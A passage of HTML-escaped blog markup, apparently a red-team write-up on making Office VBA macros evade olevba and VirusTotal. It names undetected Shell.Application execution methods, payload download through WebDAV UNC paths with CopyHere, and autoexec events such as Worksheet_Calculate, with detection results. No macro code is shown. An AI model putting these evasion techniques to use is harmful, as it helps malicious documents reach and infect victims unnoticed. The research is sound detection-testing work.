    style=&quot;padding-bottom: 107.55208333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAWCAIAAABPIytRAAAACXBIWXMAAAsTAAALEwEAmpwYAAABzUlEQVR42o1UCZLjIAz0Y2ZjG2NuzOEznsz8/0nbwG7umaSqS4UxLQmpRdXO8UA0mSNZYmPdodF1a94BTlZKr3o4cjFJvUq99HJsu6EhFiiH0iKvy+YZmWxXaVftjm78GuIJi57HXoxcTULP8KXsJvSihw07IFyjKhFStP8BC7BDetfSoaWOUNf1HvY+MtwDTI5MTlxOLEOahYmxbi45Jzym7afvYTwhYcoDfBMEpA5rRL5L8hE5slkoj39qdcFBwr4m4zJICUmmTGr9knBLZsH44xA+bdiNO6JtyFmZFV14TUZ50B5UiMs5V8Wc2/sOebw+985Vb8i9iCibtAuHNQvqXFyU4p2dPvqtICbjd/ApC7htahi0kTXTMY9yNl0STJJK554oDLUBs+sdhIn6JUc8gFkUigU+y+aTPuN3TkndtPoZ7smEIkP7dpHUFXR1PcB3Q/c7EtnEXeaplMNad/YfSB4DmvDbYyD2rRNe7htbZzLFNobW+0YNrfPdNuKFqan5SbYVepC0rZK8PvI8fJTyNBf7o0iMXdM8C8xzej14tumTB6EmtBD7h5zkk2p/60kwN/EQmbfMB+YXHmYeYB3zdX5SChMdLVc9k/8CjEfu1RALM/8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros18&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6b19c57b298a1342f3909c5b92d360e8/a1dd2/AdvancedVBAmacros18.png&quot;
        srcset=&quot;/website/static/6b19c57b298a1342f3909c5b92d360e8/804b2/AdvancedVBAmacros18.png 384w,
/website/static/6b19c57b298a1342f3909c5b92d360e8/e5715/AdvancedVBAmacros18.png 768w,
/website/static/6b19c57b298a1342f3909c5b92d360e8/a1dd2/AdvancedVBAmacros18.png 838w&quot;
        sizes=&quot;(max-width: 838px) 100vw, 838px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Undetected code execution methods/functions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;We started &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/shell-entry&quot;&gt;digging into the documentation&lt;/a&gt; looking for unknown execution methods of Shell.Application Object&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/decalage2/oletools/blob/master/oletools/olevba.py#L658&quot;&gt;This is the section&lt;/a&gt; in the olevba code where the suspicious methods/functions list is defined by regex or keyword.&lt;/p&gt;
&lt;p&gt;We have identified three interesting examples:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/invokeverbex&quot;&gt;InvokeVerb&lt;/a&gt; and &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folderitem-invokeverb&quot;&gt;GitHub Pages&lt;/a&gt;: dropping an executable and calling the verb &quot;Open&quot; it is possible to run it. As soon as I spotted these methods &lt;a href=&quot;http://ww38.gitmemory.com/issue/decalage2/oletools/419/650815715&quot;&gt;I tweeted them&lt;/a&gt;.
&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folderitemverb-doit&quot;&gt;DoIt&lt;/a&gt;: slightly more tricky but same concept of invokeverb.
&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/shell-controlpanelitem&quot;&gt;ControlPanelItem&lt;/a&gt;: by dropping a malicious &lt;a href=&quot;https://support.microsoft.com/it-it/topic/description-of-control-panel-cpl-files-4dc809cd-5063-6c6d-3bee-d3f18b2e0176&quot;&gt;.cpl&lt;/a&gt; into the current directory, it is possible to execute malicious code
While we were looking for undetected methods to perform code excecution, we have observed that, surprisingly, the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/create-method-in-class-win32-process&quot;&gt;Create&lt;/a&gt; method of &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process&quot;&gt;Win32_Process&lt;/a&gt;, retrievable only through GetObject, is not yet detected by olevba.&lt;/p&gt;
&lt;p&gt;However, we decided to avoid it because it has been used in &lt;a href=&quot;https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/&quot;&gt;many opportunistic campaigns&lt;/a&gt; and some custom implementations, such as ours, easily detect it.&lt;/p&gt;
&lt;p&gt;All other interesting methods of WMI code execution, which are not detected by the analyzed tools, require a &lt;a href=&quot;https://en.wikipedia.org/wiki/Mandatory_Integrity_Control&quot;&gt;high integrity level&lt;/a&gt;, which is out of scope.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Undetected methods/functions to get our malicious file&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Since we have identified three methods to launch an executable without arguments, we need a function to get our malicious executables.&lt;/p&gt;
&lt;p&gt;In order not to leave our executable embedded in the document we decided to download our sample remotely through an &lt;a href=&quot;https://en.wikipedia.org/wiki/Path_(computing)#UNC&quot;&gt;UNC path&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;To achieve this task we decided to exploit &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsmod/5201d251-59a1-4c99-af7b-3fbcf0cabd44&quot;&gt;SMB redirector&lt;/a&gt; or &lt;a href=&quot;https://learn.microsoft.com/en-us/iis/publish/using-webdav/using-the-webdav-redirector&quot;&gt;WebDAV redirector&lt;/a&gt;, this is because it is not possible to map a UNC resource on a unit or link it with a &lt;a href=&quot;https://en.wikipedia.org/wiki/Mandatory_Integrity_Control&quot;&gt;medium integrity level&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Allowing outbound SMB traffic is a bad practice, so we decided to take advantage of &lt;a href=&quot;https://httpd.apache.org/docs/2.4/mod/mod_dav.html&quot;&gt;WebDav SSL&lt;/a&gt; (HTTPS).&lt;/p&gt;
&lt;p&gt;So we decided to exploit the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/shell/folder-copyhere&quot;&gt;CopyHere&lt;/a&gt;.Application method to download our executables via WebDav SSL.&lt;/p&gt;
&lt;p&gt;During the tests we also found that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-directory&quot;&gt;Win32_Directory&lt;/a&gt;, a class with some filesystem methods not detected by olevba, does not support SMB/WebDav redirector.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object&quot;&gt;FilesystemObject&lt;/a&gt; supports the following undetected methods to achieve this task:
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/copyfolder-method&quot;&gt;CopyFolder&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/movefile-method&quot;&gt;MoveFile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/movefolder-method&quot;&gt;MoveFolder&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We decided to avoid FileSystemObject because it didn&apos;t work through GetObject, even if it is not enough to detect our samples it was interestingly keeping us on the 0 hits..&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Undetected autoexec sub events&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/decalage2/oletools/blob/master/oletools/olevba.py#L614&quot;&gt;This is the section&lt;/a&gt; in the olevba code where the autoexec list is defined by regex or keyword&lt;/p&gt;
&lt;p&gt;Hunting for undetected autoexec sub event:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://docs.microsoft.com/en-us/office/vba/api/ov...%5D(https://learn.microsoft.com/en-us/office/vba/api/overview/)&quot;&gt;https://docs.microsoft.com/en-us/office/vba/api/ov...&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Docs/Office/VBA/Reference/&lt;program&gt;/Object model/&lt;object&gt;/Events/&lt;eventname&gt;&lt;/p&gt;
&lt;p&gt;We have identified three interesting examples:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/word.document.contentcontrolonenter&quot;&gt;Document_ContentControlOnEnter&lt;/a&gt;: it triggers when a user &quot;enters&quot; a content control, there are several content controls that can easily attract a user click.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/excel.worksheet.followhyperlink&quot;&gt;Worksheet_FollowHyperlink&lt;/a&gt;: it triggers when a user clicks on a link inside a worksheet, the link can also point to a worksheet component.&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://learn.microsoft.com/en-us/office/vba/api/excel.worksheet.calculate(even)&quot;&gt;Worksheet_Calculate&lt;/a&gt;: &quot;Occurs after the worksheet is recalculated for the Worksheet object&quot;, this autoexec sub event is the most interesting we have envied: by using a cell with a formula that points to itself, it is possible to perform an autoexec without user interaction. As shown in the gif of the next section a prompt is shown to the user but, whatever the answer is, the macro is still executed.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;Results&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The outputs shown below are those of the following command:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;olevba --decode --reveal &amp;lt;doc&gt; # 0.56dev6 on Python 2.7.17&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Document_ContentControlOnEnter.docm:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f3dc7c32e7786be634a3259b7aecd539/4d08a/AdvancedVBAmacros19.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 78.90625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsTAAALEwEAmpwYAAABx0lEQVR42pWT25KjMAxE/f+/OGQMGBvwJeAQzM7bHtmVzM5W7cN2EpfAurRaivLez/PirMVw1q0C79xsrcs5H8fxeDzk5KEa5wulFDWOY98PXdf1w3C73ay1vBmGYRzNIliNMeuy2mky00RGcn0Hm9Fo3WutCQshkvx6o5TzJ57P54/KIQTvgxW4fd+3O9jEqDj/DQku10mHMIc2CSAaYiRBEEQ8hEDFVV5WfZDgeZ5pJcaIL6UglivoLe9533YS7Tm/ubRbCCKecs6NxtQ6YV0XORdRHIO8jGCZZ7jQGlMA5Eox4UA6Rc7JOl7RxoEe7VvO43g2gk2j8hKvacYtp4IDfTIPGu77nnnI8LQ2ZkILeDEIN4vB1afuRQk+IdKRorp1tklFgP7UOPECG9owtZMVY5VuSJTu96+vX1XIS/FDLaaNd9fdkP3jo8MpJhlaTCnFSBiCYjJFWUAfuEJRJbcpUZn9obgII6dHzFxFBjL6TSQXnWUXtra5CgHYRApKMymRlnm0AELfKRhclh/D2zD2PYtgcEYMdhgKEl83hHi/+mZU4pGEsXYCqSheSSrP8gey5L6u7wVqs/kTfz9XqPcCnv+JUspvfBt7nvq3GckAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros19&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f3dc7c32e7786be634a3259b7aecd539/4d08a/AdvancedVBAmacros19.png&quot;
        srcset=&quot;/website/static/f3dc7c32e7786be634a3259b7aecd539/804b2/AdvancedVBAmacros19.png 384w,
/website/static/f3dc7c32e7786be634a3259b7aecd539/4d08a/AdvancedVBAmacros19.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/website/36bbd8723da7719014382607bb41eaba/AdvancedVBAmacros20.gif&quot; alt=&quot;AdvancedVBAmacros20&quot;&gt;&lt;/p&gt;
&lt;p&gt;Worksheet_FollowHyperlink.xlsm:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 711px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/054caaf76c1a0307eb4ad12e6d64ebaa/a8e5b/AdvancedVBAmacros21.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 180.20833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAkCAIAAAAGkY33AAAACXBIWXMAAAsTAAALEwEAmpwYAAADaUlEQVR42oWV6XarMAyE8/4P2NNsLGEzYPYt+ddPMiXcNulVOAQwkkejkTj0zoaB0ziO+9thGHgy6PXz+fftNE2HpmmstfM0N3VtbcXiNE4cXddVVVVXNRfuyY9jnucDb5SlXZaZECYzLiQLbdvmeV4UBdGnVybOBO6Hfhz4EXAaNuSaBU8c8r0JfAACm53TNGVb9nFnoi3L0jZtWZSYLcmmsnISjDyp65oLgh6AB7Cu03PfcwslG2xeNSYnSLFamRc5UUyWAflAGGCQswM5zWs+rPFuLSzKnrXyyj84eB8AABS2cXPOy/w0cS7Lpm3nX6bRyWxxbJcSVRIuHFTWcE6SRK/nt2yDxOGpHR+FBMITwFmWgVzq/M6ZdwthRHiEmywzWCZm4kh+aZa9daZu4L/f7+Dn/vF43NVYvD/EyO09bFtRgEpSXnPGuIXIOI5ZWkvw6xDnemeiZcm+btXIpamlFqOqbNQ+2a5FYZsS1zqrHjdJ/tbmZuKcpVkQBLfbLYoi3w/SNIujKAxvSboaK7kxURQHspqK2wY7N7nv+bzNMmyjpHeFfUEYJFEZmpHigHtD239j+8uZqoDqevUA7/shqqLScEa1SWF+ZU9nOg7AlXJNedzOnc4giGyR/7d1YtLLe3lWmq0pVNVk4UaKXuckQ9hCNSttKc3cIJtZO+PAH9KARtYTpZgo5I8qxcNaeYKK6GEj0nW9wB49LcnE4FVSTZMUyoMwjOMkDMMgCCkSS3BBFbmgnJfLBRCTjiqpM4TREiAHJHU+HU++7yNM2mtTntW+g5FKB6rjxQ1AGT0gYjfRQ24SgZFCYePGiAWwcQ0v+UsDCC9QeoC/NEnAyD1ROh1pmzDHV/ZkG9JEZH5ASNCez2eypcIy94qC/bXP2bnS+Qfl5TrsnDMP1QEZxyTseR4pOKhu+mFvh0ESS5ps5ZpBBostDdkbKm+BzrHX1l7bOVsZNwd0YskYSmV6OZWvmoObrt+rfXW+Xq4Q7V35+ajj4+PjcqaiV4ggCtTHwmh4C0Oi/3QmS6kS/p5/Op0RA8xRIci/qxJ1SC+qyn9hQyAaYkwmcQxPqIWt5FtR1Sxv37p9kZ7O6O50PIIQmj8/j0B3FOg3zv4xGNauYiuIhSfYRsbuc6n1HP8zDH7E3gTgMp3f27IsXxmB3henPFdCAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros21&quot;
        title=&quot;&quot;
        src=&quot;/website/static/054caaf76c1a0307eb4ad12e6d64ebaa/a8e5b/AdvancedVBAmacros21.png&quot;
        srcset=&quot;/website/static/054caaf76c1a0307eb4ad12e6d64ebaa/804b2/AdvancedVBAmacros21.png 384w,
/website/static/054caaf76c1a0307eb4ad12e6d64ebaa/a8e5b/AdvancedVBAmacros21.png 711w&quot;
        sizes=&quot;(max-width: 711px) 100vw, 711px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;In this case the VB_Base attribute triggers olevba, olevba exchanges the GUID for a Hex String. This is a known and usually filtered false positive. For this reason we can safely consider this sample as one with 0 hits.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/website/c61e1a7bdf861a60f7f2cc8ea0bc0011/AdvancedVBAmacros22.gif&quot; alt=&quot;AdvancedVBAmacros22&quot;&gt;&lt;/p&gt;
&lt;p&gt;Worksheet_Calculate.xlsm:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ab78c9866f1cf5a2e38117a43a1651c1/394f7/AdvancedVBAmacros23.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 191.14583333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAmCAIAAABLWSz8AAAACXBIWXMAAAsTAAALEwEAmpwYAAADdUlEQVR42oWV63ajMAyEef8n7LYJhIu5GgwJhrS/9pOcsLRNsjo5xhjLM5JGTnRRO6vN83zeGeusbF9/mJ99NAxD27beeyZd17HVq03TZNXGcfSPbFmWqO97a3teettzCnjhAz6dmnOO98fOIMArkGdp3kgqZ1lR5r+NTxG4ZVmC2TQtJOum4bh1XRXZtix2MOtltDLChQB5wT9ik3P8nBsceLyyGmhznBxa8xD+vHYdGM3QD1VVs0FiPuvuQDKExwA+sH1Iie3dOPIc9A0MKEzjFAGJG7tlXFf5iYkzTCG1hHfN0H5OaBFnwKoVZhZKdV0DGGIujIHq4v2rUsEKC2kgNsZpGlmoatLXvKozu1u1gIxDhdViIGd5weSpM9FD8nq9Ak4cn2q88o3J19cnaXjqHKhK/awNFMDnIBJpTBmU65cHv3vMfYj5XhdJspM6t1KqWaU2q9B0fglzUdjWT7c6qx6DJMPb5YmJM9rM1CQ9WUaycjVjikotz/K6qk1RpFlmjDlfzstGm89Jkp6SJNfEDs4tv3poI7Wfi7MKo6mlRFKSi9K8x3Xxz02cr5/XqiyPh8PxeEziU1GYsqrIPbUuy2qP+ahUXcd+zXQvLTXfbiXtraecvbSDKiwvClVU02oPdrdSD17Vj4JWaZgwX7f2kMbgwVZybvVWaNT0rFql05W0RyuCJxB+QQhg3FqSfYZCGWqWp5nUKT1haVEUHHdKThSikormH+8fnKhxTVCPkDGE0zRjZN+fP+9kzmgzquwcI/iSETfKVTQMQUW3xhinCXAUwhFwBhlMkatcxnJ5aQjSALStRtWwiKPcYeCgHkFx7jxNg94tmhuv+Vln/0Qk5DJIkishTdPD4ZAkJ1Y0ZsOEkYiEcN8LBWu3m0iyTYXyAjGXHEG+4jiBCywkZrnz+sv9At/XXJzDKuTJfhzHojAkVlahJdEsMRL3b8HfnMXfz0BAEgcw6Zl9hz6VJw+OJ42hS8OVFMTkX5q2ZFkdj7EWQ/4XYFvLHVgTxfzIvjmzCTVRWQKm1CT27e0tFku4OgmkVBPZZTnxf3MGB+QszagNHrQmIzKRDrE2/Ef+u8N+IjdNLOrN1f+EgI0Uliy412ErcrMhJzLJciigxHD7LsvyylljlgYqiCrNjho5BSPacZz+g3yr5Lwb79/2rf/b1nX9CxmTURNthlMiAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros23&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ab78c9866f1cf5a2e38117a43a1651c1/394f7/AdvancedVBAmacros23.png&quot;
        srcset=&quot;/website/static/ab78c9866f1cf5a2e38117a43a1651c1/804b2/AdvancedVBAmacros23.png 384w,
/website/static/ab78c9866f1cf5a2e38117a43a1651c1/394f7/AdvancedVBAmacros23.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Also here as in the previous sample the hit is due to the VB_Base attribute.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/website/9092770a011f03c497782376e63cbf4b/AdvancedVBAmacros24.gif&quot; alt=&quot;AdvancedVBAmacros24&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Virustotal&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;For these tests only static analysis is significant, however these are the samples:&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/086d2cd274695c85f41a67aecc0d8fa451f4b12373265c3ab5f9007be33b4e29/detection&quot;&gt;Document_ContentControlOnEnter.docm&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/cf934b93f941e67f713b680507686011/a5a94/AdvancedVBAmacros25.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 32.55208333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwklEQVR42o1Pya4DIQzj/z+zh0qdUjoTSFgSSAPV63J6NTk4DrJsR6dzY+Ej8jWwv3M4Wmts7we4cPU5596YcxGbUludh7pgpH9g+vLb1/lw66OHEC7b9hyAaHZEhIi1Fv3DGMN0EUkprVN1VLB1NoZLIiT7pN/4Uj6427Y9JQKAUsp938ty8d7b+n9nf2vWVLoIZd5BEskYVszivXoizThzMTFihzQnV/eOlItCUkCNpCyvbOaCC+aofWgijahH1Fwf/GaYgGa14AEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros25&quot;
        title=&quot;&quot;
        src=&quot;/website/static/cf934b93f941e67f713b680507686011/71c1d/AdvancedVBAmacros25.png&quot;
        srcset=&quot;/website/static/cf934b93f941e67f713b680507686011/804b2/AdvancedVBAmacros25.png 384w,
/website/static/cf934b93f941e67f713b680507686011/e5715/AdvancedVBAmacros25.png 768w,
/website/static/cf934b93f941e67f713b680507686011/71c1d/AdvancedVBAmacros25.png 1536w,
/website/static/cf934b93f941e67f713b680507686011/a5a94/AdvancedVBAmacros25.png 1657w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/aea556034de3986613dc0f1537b8beb9580fa88807455b47520df13756817bc8/detection&quot;&gt;Worksheet_FollowHyperlink.xlsm&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4cc94a708b951b198ab8ca9e0252c236/bd44e/AdvancedVBAmacros26.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 43.22916666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+ElEQVR42mVRy5LEIAj0/z9vT3ve2kumoiEqoqJhMa/J1PaBQqHpFg19fZN1jTLPC1vgGbjUylzPUMsD9RNmmqZElHP2AAHW6EMMUYE4Ykppu9B7J6LKFfd7nWWWZSm9ee+n12u2MwAw89F6QC7oZWtNo9KOxCD6XPJu8rDKStCyxlvwxjhu2zFokH9+vbWkymppBUBETZxzw+E/jGc/3m9ipH2WSKkCQdYwkgdaYx10HfrocV5w3BjdzFk4yVEoK+NBbm+yrkAbVACTWjfpLijZrQJeAkouN1m3oH/xVl68WJC0K/Mt8lYun7YbXu761lOMRZn7U/8ATvUOkaK0xdgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros26&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4cc94a708b951b198ab8ca9e0252c236/71c1d/AdvancedVBAmacros26.png&quot;
        srcset=&quot;/website/static/4cc94a708b951b198ab8ca9e0252c236/804b2/AdvancedVBAmacros26.png 384w,
/website/static/4cc94a708b951b198ab8ca9e0252c236/e5715/AdvancedVBAmacros26.png 768w,
/website/static/4cc94a708b951b198ab8ca9e0252c236/71c1d/AdvancedVBAmacros26.png 1536w,
/website/static/4cc94a708b951b198ab8ca9e0252c236/bd44e/AdvancedVBAmacros26.png 1643w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/4db6c1071bdd0615c2f7f362ebadec97256e273e3f1cfa06e53ff794b80c947b/detection&quot;&gt;Worksheet_Calculate.xlsm&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/52b39fef0359aff139b034199a3e680a/807a0/AdvancedVBAmacros27.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 41.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7ElEQVR42l1P2XKEMAzL/39jX9o+tLMshJx2gomrEJahq5lcthVJJsfIH1+UksQss5Wn3VzYbqg3jMfVMn51j59fYuZMwfkYQn4hpYQlIu2AasMUyKNVSjGSaPWuNrGLnaZpsSt6+wHQ9oOpL4hsqA9xXMxWOKVQKpdSNxEc4KCHj4fg/obh4aib1dHnt7MrheCR3M0zPoN559wVdbjtKLUS15T7XqthLjmX0xkXDUkj6c1qLzNDp9/2ponUx763ZpgIIc8pYp0Wtf6NHGNEkJMM5tOqiwrbUEdIvZTR+6+MeJg5H105a8yHsv4BRzPT2EyKuOQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;AdvancedVBAmacros27&quot;
        title=&quot;&quot;
        src=&quot;/website/static/52b39fef0359aff139b034199a3e680a/71c1d/AdvancedVBAmacros27.png&quot;
        srcset=&quot;/website/static/52b39fef0359aff139b034199a3e680a/804b2/AdvancedVBAmacros27.png 384w,
/website/static/52b39fef0359aff139b034199a3e680a/e5715/AdvancedVBAmacros27.png 768w,
/website/static/52b39fef0359aff139b034199a3e680a/71c1d/AdvancedVBAmacros27.png 1536w,
